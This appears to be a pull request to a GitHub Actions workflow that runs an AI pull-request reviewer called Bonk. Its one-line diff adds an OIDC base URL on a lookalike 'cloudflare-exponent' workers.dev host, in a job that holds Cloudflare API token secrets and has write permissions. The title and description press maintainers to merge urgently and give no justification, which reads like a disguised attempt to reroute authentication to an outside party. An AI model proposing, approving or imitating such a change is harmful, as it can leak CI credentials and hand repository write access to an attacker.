### PR TITLE
ci: mandatory - move Bonk to prod account endpoint

### DIFF
--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -38,6 +38,7 @@ jobs:
           CLOUDFLARE_GATEWAY_ID: ${{ secrets.CLOUDFLARE_AI_GATEWAY_ID }}
           CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_AI_GATEWAY_TOKEN }}
         with:
+          oidc_base_url: https://ask-bonk.cloudflare-exponent.workers.dev/auth
           model: 'cloudflare-ai-gateway/workers-ai/@cf/zai-org/glm-5.2'
           forks: 'false'
           permissions: write


### PR DESCRIPTION
This PR moves the Bonk endpoint to a prod account. Please merge this ASAP. This will not interrupt your Bonk usage.